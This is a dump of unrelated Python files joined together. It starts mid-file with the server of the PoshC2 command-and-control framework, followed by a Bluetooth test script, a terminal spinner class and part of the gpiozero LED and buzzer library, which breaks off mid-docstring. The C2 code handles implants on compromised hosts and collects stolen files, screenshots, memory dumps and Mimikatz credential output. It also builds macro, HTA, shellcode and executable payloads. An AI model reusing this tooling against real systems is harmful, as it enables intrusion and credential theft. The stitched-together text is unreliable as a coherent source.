if "\\" in str(User):
User = User[str(User).index('\\') + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.PSCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
except Exception as e:
print("Decryption error: %s" % e)
traceback.print_exc()
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(HTTPResponse, "utf-8"))
else:
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
HTTPResponsePage = select_item("HTTPResponse", "C2Server")
if HTTPResponsePage:
s.wfile.write(bytes(HTTPResponsePage, "utf-8"))
else:
s.wfile.write(bytes(HTTPResponse, "utf-8"))
def do_POST(s):
"""Respond to a POST request."""
try:
s.server_version = ServerHeader
s.sys_version = ""
try:
content_length = int(s.headers['Content-Length'])
except:
content_length = 0
s.cookieHeader = s.headers.get('Cookie')
try:
cookieVal = (s.cookieHeader).replace("SessionID=", "")
except:
cookieVal = ""
post_data = s.rfile.read(content_length)
logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(s.path), str(s.headers), post_data)
now = datetime.datetime.now()
result = get_implants_all()
for i in result:
implantID = i[0]
RandomURI = i[1]
Hostname = i[3]
encKey = i[5]
Domain = i[11]
User = i[2]
if RandomURI in s.path and cookieVal:
update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
executedCmd = get_cmd_from_task_id(taskId)
task_owner = get_task_owner(taskId)
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if "loadmodule" in executedCmd:
print("Module loaded successfully")
update_task(taskId, "Module loaded successfully")
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = i[3] + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")):
update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.rsplit('/', 1)[-1]
filename = filename.rsplit('\\', 1)[-1]
filename = filename.rstrip('\x00')
original_filename = filename
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%s/downloads/%s' % (ROOTDIR, filename)):
counter = 1
while(os.path.isfile('%s/downloads/%s' % (ROOTDIR, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%s/downloads/%s' % (ROOTDIR, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%s/downloads/%s' % (ROOTDIR, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%s/downloads/%s' % (ROOTDIR, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]"):
update_task(taskId, rawoutput)
print(rawoutput)
else:
dumppath = "%sSafetyDump-Task-%s.bin" % (DownloadsDirectory, taskIdStr)
open(dumppath, 'wb').write(base64.b64decode(rawoutput))
message = "Dump written to: %s" % dumppath
update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or executedCmd.lower().startswith("invoke-mimikatz")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
process_mimikatz(outputParsed)
update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
except Exception as e:
print(Colours.RED + "Unknown error!" + Colours.END)
print(e)
traceback.print_exc()
finally:
try:
UriPath = str(s.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
if [ele for ele in sharplist if(ele in UriPath)]:
try:
open("%swebserver.log" % ROOTDIR, "a").write("[+] Making POST connection to SharpSocks %s%s\r\n" % (SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Cookie': '%s' % s.cookieHeader, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36'})
res = urlopen(r, post_data)
sharpout = res.read()
s.send_response(res.getcode())
s.send_header("Content-type", "text/html")
s.send_header("Content-Length", len(sharpout))
s.end_headers()
if (len(sharpout) > 0):
s.wfile.write(sharpout)
except URLError as e:
try:
s.send_response(res.getcode())
except:
s.send_response(500)
s.send_header("Content-type", "text/html")
try:
s.send_header("Content-Length", len(sharpout))
except:
s.send_header("Content-Length", 0)
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] URLError with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
except HTTPError as e:
try:
s.send_response(res.getcode())
except:
s.send_response(500)
s.send_header("Content-type", "text/html")
try:
s.send_header("Content-Length", len(sharpout))
except:
s.send_header("Content-Length", 0)
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] HTTPError with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
s.send_response(res.getcode())
s.send_header("Content-type", "text/html")
s.send_header("Content-Length", len(sharpout))
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(HTTPResponse, "utf-8"))
else:
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(default_response())
except Exception as e:
print(Colours.RED + "Generic error in POST request!" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
print(e)
traceback.print_exc()
ThreadingMixIn.daemon_threads = True
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def log_c2_messages():
while True:
messages = get_c2_messages()
if messages is not None:
for message in messages:
print(message)
time.sleep(2)
if __name__ == '__main__':
httpd = ThreadedHTTPServer((HOST_NAME, PORT_NUMBER), MyHandler)
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except Exception:
print("cls")
print(chr(27) + "[2J")
print(Colours.GREEN + logopic)
print(Colours.END + "")
if os.path.isfile(Database):
print("Using existing database / project" + Colours.GREEN)
C2 = get_c2server_all()
if ((C2[1] == HostnameIP) and (C2[3] == DomainFrontHeader)):
qstart = "%squickstart.txt" % (ROOTDIR)
if os.path.exists(qstart):
with open(qstart, 'r') as f:
print(f.read())
else:
print("Error different IP so regenerating payloads")
if os.path.exists("%spayloads_old" % ROOTDIR):
import shutil
shutil.rmtree("%spayloads_old" % ROOTDIR)
os.rename("%spayloads" % ROOTDIR, "%spayloads_old" % ROOTDIR)
os.makedirs("%spayloads" % ROOTDIR)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], HostnameIP, DomainFrontHeader, C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("updated_host", HostnameIP, C2[3], "", "", "", "")
update_item("HostnameIP", "C2Server", HostnameIP)
update_item("QuickCommand", "C2Server", QuickCommand)
update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
newPayload.CreatePython()
newPayload.WriteQuickstart(ROOTDIR + 'quickstart.txt')
else:
print("Initializing new project folder and database" + Colours.GREEN)
print("")
directory = os.path.dirname(ROOTDIR)
if not os.path.exists(directory):
os.makedirs(directory)
os.makedirs("%s/downloads" % directory)
os.makedirs("%s/reports" % directory)
os.makedirs("%s/payloads" % directory)
initializedb()
if not validate_sleep_time(DefaultSleep):
print(Colours.RED)
print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
sys.exit(1)
setupserver(HostnameIP, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, HTTPResponse, ROOTDIR, ServerPort, QuickCommand, DownloadURI, "", "", "", Sounds, APIKEY, MobileNumber, URLS, SocksURLS, Insecure, UserAgent, Referrer, APIToken, APIUser, EnableNotifications)
rewriteFile = "%s/rewrite-rules.txt" % directory
print("Creating Rewrite Rules in: " + rewriteFile)
print("")
rewriteHeader = ["RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1"]
rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules()
with open(rewriteFile, 'w') as outFile:
for line in rewriteFileContents:
outFile.write(line)
outFile.write('\n')
outFile.close()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("default", C2[1], C2[3], "", "", "", "")
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
create_self_signed_cert(ROOTDIR)
newPayload.CreatePython()
newPayload.WriteQuickstart(directory + '/quickstart.txt')
print("")
print("CONNECT URL: " + select_item("HostnameIP", "C2Server") + get_newimplanturl() + Colours.GREEN)
print("WEBSERVER Log: %swebserver.log" % ROOTDIR)
KEY = get_baseenckey()
print("")
print(time.asctime() + " PoshC2 Server Started - %s:%s" % (HOST_NAME, PORT_NUMBER))
print(Colours.END)
if (os.path.isfile("%sposh.crt" % ROOTDIR)) and (os.path.isfile("%sposh.key" % ROOTDIR)):
try:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLS)
except Exception:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
else:
raise ValueError("Cannot find the certificate files")
c2_message_thread = threading.Thread(target=log_c2_messages, daemon=True)
c2_message_thread.start()
try:
httpd.serve_forever()
except (KeyboardInterrupt, EOFError):
httpd.server_close()
print(time.asctime() + " PoshC2 Server Stopped - %s:%s" % (HOST_NAME, PORT_NUMBER))
sys.exit(0)
|
test1.py
|
#!/usr/bin/python
from __future__ import absolute_import, print_function, unicode_literals
from optparse import OptionParser, make_option
import dbus
import time
import dbus.mainloop.glib
import bleAdapter
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import testutils
import startTests
import threading
import securityAgent
devices = {}
def backGroundEvents():
try:
mainloop = GObject.MainLoop()
mainloop.run()
except KeyboardInterrupt:
mainloop.quit()
print("Thread: KeyboardInterrupt")
return
if __name__ == '__main__':
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
testutils.removeBondedDevices()
#startBackGroundEvents = threading.Thread(target=backGroundEvents)
#startBackGroundEvents.start()
startTests.main()
|
activity_indicator.py
|
from itertools import cycle
from shutil import get_terminal_size
from threading import Thread
from time import sleep
class ActivityIndicator:
"""NOTE: Don't put anything to stdout while this indicator is active."""
def __init__(self, message: str):
self.message = message
self._thread = Thread(target=self._animate, daemon=True)
self.steps = ["⢿", "⣻", "⣽", "⣾", "⣷", "⣯", "⣟", "⡿"]
self.interval = 1 / len(self.steps)
self.done = False
def start(self):
self._thread.start()
return self
def _animate(self):
for step in cycle(self.steps):
if self.done:
break
print(f"\r{self.message} {step}", flush=True, end="")
sleep(self.interval)
def stop(self):
self.done = True
cols = get_terminal_size((80, 20)).columns
print("\r" + " " * cols, end="\r", flush=True)
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_value, exc_tb):
self.stop()
|
output_devices.py
|
# GPIO Zero: a library for controlling the Raspberry Pi's GPIO pins
# Copyright (c) 2016-2019 Andrew Scheller <github@loowis.durge.org>
# Copyright (c) 2015-2019 Dave Jones <dave@waveform.org.uk>
# Copyright (c) 2015-2019 Ben Nuttall <ben@bennuttall.com>
# Copyright (c) 2019 tuftii <3215045+tuftii@users.noreply.github.com>
# Copyright (c) 2019 tuftii <pi@raspberrypi>
# Copyright (c) 2016 Ian Harcombe <ian.harcombe@gmail.com>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
absolute_import,
division,
)
str = type('')
from threading import Lock
from itertools import repeat, cycle, chain
from colorzero import Color
from collections import OrderedDict
try:
from math import log2
except ImportError:
from .compat import log2
from .exc import OutputDeviceBadValue, GPIOPinMissing
from .devices import GPIODevice, Device, CompositeDevice
from .mixins import SourceMixin
from .threads import GPIOThread
from .tones import Tone
class OutputDevice(SourceMixin, GPIODevice):
"""
Represents a generic GPIO output device.
This class extends :class:`GPIODevice` to add facilities common to GPIO
output devices: an :meth:`on` method to switch the device on, a
corresponding :meth:`off` method, and a :meth:`toggle` method.
:type pin: int or str
:param pin:
The GPIO pin that the device is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the device will be off initially. If
:data:`None`, the device will be left in whatever state the pin is
found in when configured for output (warning: this can be on). If
:data:`True`, the device will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, active_high=True, initial_value=False,
pin_factory=None):
super(OutputDevice, self).__init__(pin, pin_factory=pin_factory)
self._lock = Lock()
self.active_high = active_high
if initial_value is None:
self.pin.function = 'output'
else:
self.pin.output_with_state(self._value_to_state(initial_value))
def _value_to_state(self, value):
return bool(self._active_state if value else self._inactive_state)
def _write(self, value):
try:
self.pin.state = self._value_to_state(value)
except AttributeError:
self._check_open()
raise
def on(self):
"""
Turns the device on.
"""
self._write(True)
def off(self):
"""
Turns the device off.
"""
self._write(False)
def toggle(self):
"""
Reverse the state of the device. If it's on, turn it off; if it's off,
turn it on.
"""
with self._lock:
if self.is_active:
self.off()
else:
self.on()
@property
def value(self):
"""
Returns 1 if the device is currently active and 0 otherwise. Setting
this property changes the state of the device.
"""
return super(OutputDevice, self).value
@value.setter
def value(self, value):
self._write(value)
@property
def active_high(self):
"""
When :data:`True`, the :attr:`value` property is :data:`True` when the
device's :attr:`~GPIODevice.pin` is high. When :data:`False` the
:attr:`value` property is :data:`True` when the device's pin is low
(i.e. the value is inverted).
This property can be set after construction; be warned that changing it
will invert :attr:`value` (i.e. changing this property doesn't change
the device's pin state - it just changes how that state is
interpreted).
"""
return self._active_state
@active_high.setter
def active_high(self, value):
self._active_state = True if value else False
self._inactive_state = False if value else True
def __repr__(self):
try:
return '<gpiozero.%s object on pin %r, active_high=%s, is_active=%s>' % (
self.__class__.__name__, self.pin, self.active_high, self.is_active)
except:
return super(OutputDevice, self).__repr__()
class DigitalOutputDevice(OutputDevice):
"""
Represents a generic output device with typical on/off behaviour.
This class extends :class:`OutputDevice` with a :meth:`blink` method which
uses an optional background thread to handle toggling the device state
without further interaction.
:type pin: int or str
:param pin:
The GPIO pin that the device is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the device will be off initially. If
:data:`None`, the device will be left in whatever state the pin is
found in when configured for output (warning: this can be on). If
:data:`True`, the device will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, active_high=True, initial_value=False,
pin_factory=None):
self._blink_thread = None
self._controller = None
super(DigitalOutputDevice, self).__init__(
pin, active_high, initial_value, pin_factory=pin_factory
)
@property
def value(self):
return super(DigitalOutputDevice, self).value
@value.setter
def value(self, value):
self._stop_blink()
self._write(value)
def close(self):
self._stop_blink()
super(DigitalOutputDevice, self).close()
def on(self):
self._stop_blink()
self._write(True)
def off(self):
self._stop_blink()
self._write(False)
def blink(self, on_time=1, off_time=1, n=None, background=True):
"""
Make the device turn on and off repeatedly.
:param float on_time:
Number of seconds on. Defaults to 1 second.
:param float off_time:
Number of seconds off. Defaults to 1 second.
:type n: int or None
:param n:
Number of times to blink; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue blinking and return immediately. If :data:`False`, only
return when the blink is finished (warning: the default value of
*n* will result in this method never returning).
"""
self._stop_blink()
self._blink_thread = GPIOThread(
target=self._blink_device, args=(on_time, off_time, n)
)
self._blink_thread.start()
if not background:
self._blink_thread.join()
self._blink_thread = None
def _stop_blink(self):
if getattr(self, '_controller', None):
self._controller._stop_blink(self)
self._controller = None
if getattr(self, '_blink_thread', None):
self._blink_thread.stop()
self._blink_thread = None
def _blink_device(self, on_time, off_time, n):
iterable = repeat(0) if n is None else repeat(0, n)
for _ in iterable:
self._write(True)
if self._blink_thread.stopping.wait(on_time):
break
self._write(False)
if self._blink_thread.stopping.wait(off_time):
break
class LED(DigitalOutputDevice):
"""
Extends :class:`DigitalOutputDevice` and represents a light emitting diode
(LED).
Connect the cathode (short leg, flat side) of the LED to a ground pin;
connect the anode (longer leg) to a limiting resistor; connect the other
side of the limiting resistor to a GPIO pin (the limiting resistor can be
placed either side of the LED).
The following example will light the LED::
from gpiozero import LED
led = LED(17)
led.on()
:type pin: int or str
:param pin:
The GPIO pin which the LED is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the LED will operate normally with the
circuit described above. If :data:`False` you should wire the cathode
to the GPIO pin, and the anode to a 3V3 pin (via a limiting resistor).
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the LED will be off initially. If
:data:`None`, the LED will be left in whatever state the pin is found
in when configured for output (warning: this can be on). If
:data:`True`, the LED will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
pass
LED.is_lit = LED.is_active
class Buzzer(DigitalOutputDevice):
"""
Extends :class:`DigitalOutputDevice` and represents a digital buzzer
component.
.. note::
This interface is only capable of simple on/off commands, and is not
capable of playing a variety of tones (see :class:`TonalBuzzer`).
Connect the cathode (negative pin) of the buzzer to a ground pin; connect
the other side to any GPIO pin.
The following example will sound the buzzer::
from gpiozero import Buzzer
bz = Buzzer(3)
bz.on()
:type pin: int or str
:param pin:
The GPIO pin which the buzzer is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the buzzer will operate normally with
the circuit described above. If :data:`False` you should wire the
cathode to the GPIO pin, and the anode to a 3V3 pin.
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the buzzer will be silent initially. If
:data:`None`, the buzzer will be left in whatever state the pin is
found in when configured for output (warning: this can be on). If
:data:`True`, the buzzer will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
pass
Buzzer.beep = Buzzer.blink
class PWMOutputDevice(OutputDevice):
"""
Generic output device configured for pulse-width modulation (PWM).
:type pin: int or str
:param pin:
The GPIO pin that the device is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:param float initial_value:
If 0 (the default), the device's duty cycle will be 0 initially.
Other values between 0 and 1 can be specified as an initial duty cycle.
Note that :data:`None` cannot be specified (unlike the parent class) as
there is no way to tell PWM not to alter the state of the pin.
:param int frequency:
The frequency (in Hz) of pulses emitted to drive the device. Defaults
to 100Hz.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, active_high=True, initial_value=0, frequency=100,
pin_factory=None):
self._blink_thread = None
self._controller = None
if not 0 <= initial_value <= 1:
raise OutputDeviceBadValue("initial_value must be between 0 and 1")
super(PWMOutputDevice, self).__init__(
pin, active_high, initial_value=None, pin_factory=pin_factory
)
try:
# XXX need a way of setting these together
self.pin.frequency = frequency
self.value = initial_value
except:
self.close()
raise
def close(self):
try:
self._stop_blink()
except AttributeError:
pass
try:
self.pin.frequency = None
except AttributeError:
# If the pin's already None, ignore the exception
pass
super(PWMOutputDevice, self).close()
def _state_to_value(self, state):
return float(state if self.active_high else 1 - state)
def _value_to_state(self, value):
return float(value if self.active_high else 1 - value)
def _write(self, value):
if not 0 <= value <= 1:
raise OutputDeviceBadValue("PWM value must be between 0 and 1")
super(PWMOutputDevice, self)._write(value)
@property
def value(self):
"""
The duty cycle of the PWM device. 0.0 is off, 1.0 is fully on. Values
in between may be specified for varying levels of power in the device.
"""
return super(PWMOutputDevice, self).value
@value.setter
def value(self, value):
self._stop_blink()
self._write(value)
def on(self):
self._stop_blink()
self._write(1)
def off(self):
self._stop_blink()
self._write(0)
def toggle(self):
"""
Toggle the state of the device. If the device is currently off
(:attr:`value` is 0.0), this changes it to "fully" on (:attr:`value` is
1.0). If the device has a duty cycle (:attr:`value`) of 0.1, this will
toggle it to 0.9, and so on.
"""
self._stop_blink()
self.value = 1 - self.value
@property
def is_active(self):
"""
Returns :data:`True` if the device is currently active (:attr:`value`
is non-zero) and :data:`False` otherwise.
"""
return self.value != 0
@property
def frequency(self):
"""
The frequency of the pulses used with the PWM device, in Hz. The
default is 100Hz.
"""
return self.pin.frequency
@frequency.setter
def frequency(self, value):
self.pin.frequency = value
def blink(
self, on_time=1, off_time=1, fade_in_time=0, fade_out_time=0,
n=None, background=True):
"""
Make the device turn on and off repeatedly.
:param float on_time:
Number of seconds on. Defaults to 1 second.
:param float off_time:
Number of seconds off. Defaults to 1 second.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 0.
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 0.
:type n: int or None
:param n:
Number of times to blink; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue blinking and return immediately. If :data:`False`, only
return when the blink is finished (warning: the default value of
*n* will result in this method never returning).
"""
self._stop_blink()
self._blink_thread = GPIOThread(
target=self._blink_device,
args=(on_time, off_time, fade_in_time, fade_out_time, n)
)
self._blink_thread.start()
if not background:
self._blink_thread.join()
self._blink_thread = None
def pulse(self, fade_in_time=1, fade_out_time=1, n=None, background=True):
"""
Make the device fade in and out repeatedly.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 1.
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 1.
:type n: int or None
:param n:
Number of times to pulse; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue pulsing and return immediately. If :data:`False`, only
return when the pulse is finished (warning: the default value of
*n* will result in this method never returning).
"""
on_time = off_time = 0
self.blink(
on_time, off_time, fade_in_time, fade_out_time, n, background
)
def _stop_blink(self):
if self._controller:
self._controller._stop_blink(self)
self._controller = None
if self._blink_thread:
self._blink_thread.stop()
self._blink_thread = None
def _blink_device(
self, on_time, off_time, fade_in_time, fade_out_time, n, fps=25):
sequence = []
if fade_in_time > 0:
sequence += [
(i * (1 / fps) / fade_in_time, 1 / fps)
for i in range(int(fps * fade_in_time))
]
sequence.append((1, on_time))
if fade_out_time > 0:
sequence += [
(1 - (i * (1 / fps) / fade_out_time), 1 / fps)
for i in range(int(fps * fade_out_time))
]
sequence.append((0, off_time))
sequence = (
cycle(sequence) if n is None else
chain.from_iterable(repeat(sequence, n))
)
for value, delay in sequence:
self._write(value)
if self._blink_thread.stopping.wait(delay):
break
class TonalBuzzer(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a tonal buzzer.
:type pin: int or str
:param pin:
The GPIO pin which the buzzer is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param float initial_value:
If :data:`None` (the default), the buzzer will be off initially. Values
between -1 and 1 can be specified as an initial value for the buzzer.
:type mid_tone: int or str
:param mid_tone:
